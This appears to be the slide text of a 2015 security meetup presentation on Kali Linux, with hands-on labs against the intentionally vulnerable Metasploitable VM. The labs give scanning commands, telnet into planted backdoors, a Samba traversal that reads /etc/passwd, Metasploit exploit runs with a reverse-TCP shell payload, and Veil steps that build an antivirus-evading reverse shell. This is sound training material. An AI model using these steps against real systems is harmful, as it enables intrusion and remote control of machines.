Kali Linux - CleveSec 2015

1. What is Kali Linux? CleveSec MeetUp Group Westlake, Ohio

2. Welcome

3. Welcome Tony Godfrey is the CEO / Linux Consultant of Falconer Technologies (est 2003) specializing in Linux. He has written several articles on the body of knowledge of security administration, is a regular contributor to a variety of Linux publications, and has written technical content for Linux education nation-wide at the college level. He also teaches topics covering Linux, Network Security, Cisco routers, Cybercrime and System Forensics.

4. Thank you Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859

5. Welcome Side Note: I put a lot of extra materials, websites, & definitions in the ‘Notes’ section of this PPT.

6. Overview of Presentation Intro, Description, How used, Background Extra Info, Kali in a Box, Raspberry PI Tools, Overview, & Conclusion Setting up the Environments CLI 101 / Tools 101 Kali 101, 201, & 301

7. Presentation on Kali Linux Intro

8. Who or What is ‘Kali’?

9. Who is Kali? Kali the mother goddess despite her fearful appearance, protects the good against the evil. Unlike the other Hindu deities her form is pretty scary and formidable, intended to scare away the demons both literally and figuratively! Anu Yadavalli

10. Hindu Kali

11. What is Kali Linux? Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

12. BackTrack? Kali Linux is the ‘rebirth’ of BackTrack Linux. This is a custom distribution designed for security testing for all skill levels from novice to expert. It is the largest collection of wireless hacking, server exploiting, web application assessing, social-engineering tools available in a single Linux distribution.

13. Developers - March 12, 2013 “Seven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.”

14. Developers - March 12, 2013 “After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date. Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux.”

15. Warning! Warning! Kali Linux’s developers would like everyone to use Kali Linux. But, Kali is a Linux distribution specifically geared towards professional penetration testing and security auditing and as such. It is NOT a recommended distribution for those unfamiliar with Linux.

16. Hardware / Software Kali likes its own dedicated hardware. If you are learning about Kali and penetration testing (Metaspolitable) then a virtualized environment may be a consideration. VMware Player 5 works well and set the RAM to 1gb.

17. Hardware / Software Kali recommends 10gb for the initial install, 512MB RAM min, i386/AMD64, CD/DVD / USB support. Now…if ‘Veil’ is installed (+ 10gb) and doing the updates/upgrades (+ 5gb), and don’t forget the Alfa antenna.

18. http://www.kali.org/

21. Other guys?

22. Other guys? BackBox BackBox is an Ubuntu-based distribution developed to perform penetration tests and security assessments. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always updated to the latest stable versions of the most often used and best-known ethical hacking tools.

23. Other guys? Pentoo Pentoo is a Live CD/USB designed for penetration testing and security assessment. Based on Gentoo, it is provided both as 32/64 bit installable livecd. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment.

24. Other guys? BlackBuntu BlackBuntu is distribution for penetration testing which was specially designed for security training students and practitioners of information security. Blackbuntu is penetration testing distribution with GNOME Desktop Environment. It's currently being built using the Ubuntu 10.10.

25. Other guys? EnGarde EnGarde Secure Linux was designed to support features suitable for individuals, students, security enthusiasts, and those wishing to evaluate the level of security and ease of management available in Guardian Digital enterprise products.

26. Other guys? A few more….

27. Presentation on Kali Linux Categories & Websites

28. What’s in the box, Pandora?

29. There are several categories Top 10 Security Tools Information Gathering Vulnerability Analysis Web Applications / Password Attacks Wireless Attacks / Exploitation Tools Sniffing/Spoofing / Maintaining Access Reverse Engineering Stress Testing / Hardware Hacking Forensics / Reporting Tools System Services

30. Metapackages also exist

31. Kali Information See ‘Notes’ section in this slide

32. Information Getting your pentesting lab ready Hacking tutorial 20 things to do after installing Kali Cracking WEP 6 Resources & Tutorials on Kali

33. Kali & More PenTesting See ‘Notes’ section in this slide

34. Kali & More PenTesting PenTest Tools Penetration Testing Tools PenTestMag Chrome as a PenTest Tool Firefox as a PenTest Tool

35. Kali-specific Websites See ‘Notes’ section in this slide

36. Kali-specific Websites Kali4Hackers Hacking with Kali Linux YouTube Kali Linux Hack with Kali Linux

37. Kali Publications See ‘Notes’ section in this slide

38. Kali Publications Kali Book BackTrack to Kali Basic Security Testing with Kali Kali Linux Assuring Security

39. Kali in a box? Do you want to run Kali on tablet or phone? http://www.kali.org/how-to/kali-linux-android-linux-deploy/

40. Kali in a box? Basically…. 1.Get a tablet 1. Install ‘Linux Deploy’ 2. Install Samsung Kies on PC 3. Tablet - USB Debugging ON 4. Install SuperOneClick on PC 5. Wait 5 minutes… 6. Done

41. Kali + Nexus = NetHunter Do you want to run Kali on a Nexus? http://www.kali.org/kali-linux-nethunter/

42. Kali on a Nexus?

43. Kali & Lifehacker How to hack your own network and beef up its security with Kali Linux http://lifehacker.com/how-to-hack-your-own-network-and- beef-up-its-security-w-1649785071

44. Kali & Raspberry PI See ‘Notes’ section in this slide

47. What is Metaspolitable? See ‘Notes’ section in this slide

48. Metaspolitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. The default login and password is msfadmin:msfadmin

49. Presentation on Kali Linux DVD, Tools, Demo

50. What’s on the Drive? /books ◦Official Kali Guide ◦eForensics ◦Other published materials /media ◦7-Zip, kali_iso, metaspolitable doc, SD_formatter, Unetbootin, USB_installer, VMware, Win32_DiskImager /PPT

51. Legend  We’re going to type something  We’re going to make a note  Might be a question?  We’re going to click on something  Recon  Attack

52. traceroute  traceroute Essentially, ‘tracert’ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network

53. traceroute

54. nmap  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

55. nmap

56. nmap  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.

57. nmap

58. rpcinfo  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

59. rpcinfo

60. tcpdump On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com

61. nikto On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.

62. nikto

63. whatweb From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

64. whatweb

65. Zenmap (GUI for nmap) Let’s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap

66. Zenmap (GUI for nmap)

67. SHODAN Let’s run SHODAN  Open a browser  www.shodanhq.com  type in ‘almost anything’  …Be very nervous…

68. SHODAN

69. dmitry If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP’s

70. dmitry

72. veil Kali has many built-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.

73. veil

74. veil

75. Presentation on Kali Linux Final Thoughts

77. Thank you Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859

78. Use your powers for good

79. Thank You

80. The second part of this slide deck covers more tools and hands-on.

81. Presentation on Kali Linux Lab #1 & Prep

82. Getting Ready… - Let’s make a folder called  kali_2015 - Copy the DVD contents into that folder - Install 7-Zip - Install VMware Player Let’s make sure the virtual environments are working and can ‘ping’ each other

83. VMware Player Press <CTRL><Alt> at the same time to be released from the current virtual environment. You can then do a normal <Alt><Tab> to toggle between different applications.

84. Logins / Passwords Kali Login  root Kali Password  password Metaspolitable Login  msfadmin Metaspolitable Password  msfadmin Download Metaspolitable from: http://sourceforge.net/projects/metasploitable/

85. Metaspolitable V/E  Login  msfadmin  Password  msfadmin  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway

86. Metaspolitable V/E Virtual Environment #1 ◦Metaspolitable  Go to TERMINAL rlogin –l root <IP Address> cd /tmp ls -l ...vs... ls -la rm .X0-lock  startx

87. Kali V/E  Login  root  Password  password  ifconfig  Jot down the IP & Netmask  route  Jot down the Gateway

88. Kali V/E Go to: Applications  System Tools  Preferences  System Settings  Display  Resolution: ____ Then…[Apply]

89. Kali Updating From the command line, type  apt-get update && apt-get upgrade Note: This has already been done to save time, but should be done after a new installation.

90. Presentation on Kali Linux Lab #2 – Command Line Tools

91. Command Line Tools Presentation on Kali Linux

92. Legend  We’re going to type something  We’re going to make a note  Might be a question?  We’re going to click on something  Recon  Attack

93. ping  ping Packet InterNet Groper Port = 8 Establishes physical connectivity between two entities  (from Kali) ping <Target IP> Did it echo back?

94. top  top Tells us what services are running, processes, memory allocation Basically, a live system monitor

95. df  df Tells us how much space is available or ‘disk free’

96. du  du Tells us how much space is taken or ‘disk used’. You can get a shorter report by…  ‘du –s’ … (disk used –summary)

97. free  free How much ‘free’ memory is available

98. ls  ls This is for ‘list’  ls –l (list –long)  ls -la (list – long – all attributes)

99. pwd  pwd Directory structure Means ‘path to working directory’ or ‘print working directory’

100. ps / ps aux / pstree  ps Means ‘Process Status’ ◦aux – auxiliary view ◦pstree – shows parent/child relationships ◦Windows – tasklist / taskkill Kill - Stops a process (ex: kill PID)

101. Presentation on Kali Linux Lab #3 – CLI & Services

102. CLI & Services Presentation on Kali Linux

103. traceroute  traceroute Essentially, ‘tracert’ in Windows  traceroute –i eth0 <Target IP> It displays the route (path) and measuring transit delays of packets across an Internet Protocol (IP) network

104. nmap  nmap –p0-65535 <Target IP> | less A security scanner used to discover hosts and services on a computer network, thus creating a "map" of the network

105. nmap  nmap –sS –Pn –A <Target IP> A security scanner used to discover hosts and services on a computer network – ‘sS’ is stealth scan, ‘Pn’ not to run a ping scan, and ‘A’ is O/S detection, services, service pack.

106. rlogin (from Metaspolitable)  rlogin –l root <Target IP>  whoami  tcpdump -i eth0 host <Target IP> A packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.

107. rpcinfo  rpcinfo –p <Target IP> A utility makes a Remote Procedure Call (RPC) to an RPC server and reports what it finds. It lists all programs registered with the port mapper on the specified host.

108. showmount  showmount –e <Target IP>  showmount –a <Target IP> It displays a list of all clients that have remotely mounted a file system from a specified machine in the Host parameter. This information is maintained by the [mountd] daemon on the Host parameter.

109. telnet  telnet <Target IP> 21 After '220...'  user backdoored:)  <CTRL><]>  quit Port 20/21 is FTP

110. telnet  telnet <Target IP> 6200 After 'Escape character...',  id; <CTRL><]>  quit Port 6200 - Oracle Notification Service remote port Oracle Application Server

111. telnet  telnet <Target IP> 6667 IRC (Internet Relay Chat) Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP, Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan, Vampire, Moses, Maniacrootkit, kaitex, EGO.

112. telnet  telnet <Target IP> 1524 After 'root@meta....',  id Many attack scripts install a backdoor shell at this port (especially those against Sun systems via holes in sendmail and RPC services like statd, ttdbserver, and cmsd). Connections to port 600/pcserver also have this problem. Note: ingreslock, Trinoo; talks UDP/TCP.

113. Presentation on Kali Linux Lab #4 – Working w/Metaspolitable

114. smbclient  smbclient –L <//Target IP>  msfconsole ...wait, wait, wait..., then use auxiliary/admin/smb/samba_symlink_traversal  set RHOST <Target IP>  set SMBSHARE tmp

115. smbclient  exploit ...Connecting to the server..... ...<yadda, yadda, yadda>... ...Auxiliary module.... At the prompt, type  exit

116. smbclient  smbclient //<Target IP>/tmp Do you get the 'smb: >' prompt?  cd rootfs  cd etc  more passwd Do you get a list of all user accts?

117. tcpdump On Kali… tcpdump –I eth0 src <Target IP> On Metaspolitable… ping www.yahoo.com open a Browser & go to CNN.com

118. netdiscover On Kali netdiscover –i eth0 –r <Target IP>/24 Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without DHCP server, when you are wardriving. It can be also used on hub/switched networks.

119. nikto On Kali  nikto –h <Target IP> Its an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.

120. sqlmap On Kali sqlmap –u http://<Target IP> --dbs It is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

121. Wasp Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> The Mutillidae are a family of more than 3,000 species of wasps (despite the names) whose wingless females resemble large, hairy ants. Their common name ‘velvet ant’ refers to their dense pile of hair which most often is bright scarlet or orange, but may also be black, white, silver, or gold.

122. Web Services From Kali – open IceWeasel  http://<Target IP>/ Research: Multillidae <p. 8> Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application

123. whatweb From Kali  whatweb <Target IP>  whatweb –v <Target IP>  whatweb –a 4 <Target IP> WhatWeb recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices.

124. Presentation on Kali Linux Lab #5 - msfconsole

125. From Kali - msfconsole Presentation on Kali Linux

126. msfconsole From Kali  service postgresql start  service metasploit start  msfconsole Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole We will then take a look at the built-in exploit tools

127. msfconsole From [msf>] console  help search  show exploits  search dns ‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.

128. msfconsole From [msf>] console  search Microsoft  search diablo  search irc  search http Let’s try a few more to see what they do….

129. msfconsole From [msf>] console, search for ‘unreal’  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT

130. msfconsole From [msf>] console (ex: unreal)  set RHOST <IP Address>  show options  exploit 

131. msfconsole From [msf>] console, search for ‘twiki’  info <exploit>  use <exploit>  show options  LHOST, RHOST, LPORT, RPORT

132. msfconsole From [msf>] console (ex: ‘twiki’)  set RHOST <IP Address>  show options  exploit 

133. msfconsole From [msf>] console, (target: Win XP)  use exploit/windows/smb/ms08_067_netapi  show options  show targets  set target 2

134. msfconsole From [msf>] console, (target: Win XP)  show options  show advanced  show targets  show payloads

135. msfconsole From [msf>] console, (target: Win XP)  set payload windows/shell_reverse_tcp  show options  set LHOST <Kali IP Address>  set RHOST <Target IP Address>

136. msfconsole From [msf>] console, (target: Win XP)  show options  exploit  Any errors? 

137. Presentation on Kali Linux Lab #6 – more GUI

138. From Kali – more GUI Presentation on Kali Linux

139. Zenmap Let’s run Zenmap  Applications  Kali Linux  Information Gathering  DNS Analysis  Zenmap

140. SHODAN Let’s run SHODAN  Open a browser  www.shodanhq.com  type in ‘almost anything’  …Be very nervous…

141. FERN Let’s run FERN  Kali Linux  Wireless Attacks  Wireless Tools  fern-wifi-cracker

142. recon-ng Kali has many built-in tools, but you can always install more (Debian-based). But, you may always wish to add more such as recon-ng. recon-ng automated info gathering and network reconnaissance.

143. recon-ng Let’s run recon-ng…  cd /opt/recon-ng  /usr/bin/python recon-ng  show modules  recon/hosts/gather/http/web/google_site

144. recon-ng Let’s run recon-ng…  set DOMAIN <domain.com>  run (…let this run awhile…)  back (…previous level…)  show modules

145. recon-ng Let’s run recon-ng…  use reporting/csv  run  Will add your new information to /usr/share/recon-ng/workspaces/default

146. dmitry If you want something more basic…dmitry  dmitry –s <domain.com>  It gives you site names & IP’s

147. veil Kali has many built-in tools, but you can always install even more (Debian- based). You may always wish to add more such as veil. veil Remote shell payload generator that can bypass many anti-virus programs.

148. veil Let’s run veil  veil-evasion  list (available payloads list)  use 13 (powershell/VirtualAlloc)  generate

149. veil Let’s run veil  1 (msfvenom)  [ENTER] (accept default)  Value for LHOST (Target IP)  Value for LPORT (ex: 4000)

150. veil Let’s run veil  Output name (“Squatch”)  It will store this new batch file to the  /usr/share/veil/output/source folder. When the file is run from the target machine, it will attempt to do a reverse shell session with Kali.

151. Presentation on Kali Linux Final Thoughts

153. Thank you Thank you for your time. Falconer Technologies TonyGodfrey@FalconerTechnologies.com 877 / TUX RULZ or 877 / 889-7859

154. Use your powers for good

155. Thank You

Kali Linux - CleveSec 2015

Kali Linux - CleveSec 2015

Recomendados

Más contenido relacionado

La actualidad más candente

La actualidad más candente(20)

Destacado

Destacado(18)

Similar a Kali Linux - CleveSec 2015

Similar a Kali Linux - CleveSec 2015(20)

Último

Último(14)

Kali Linux - CleveSec 2015

Notas del editor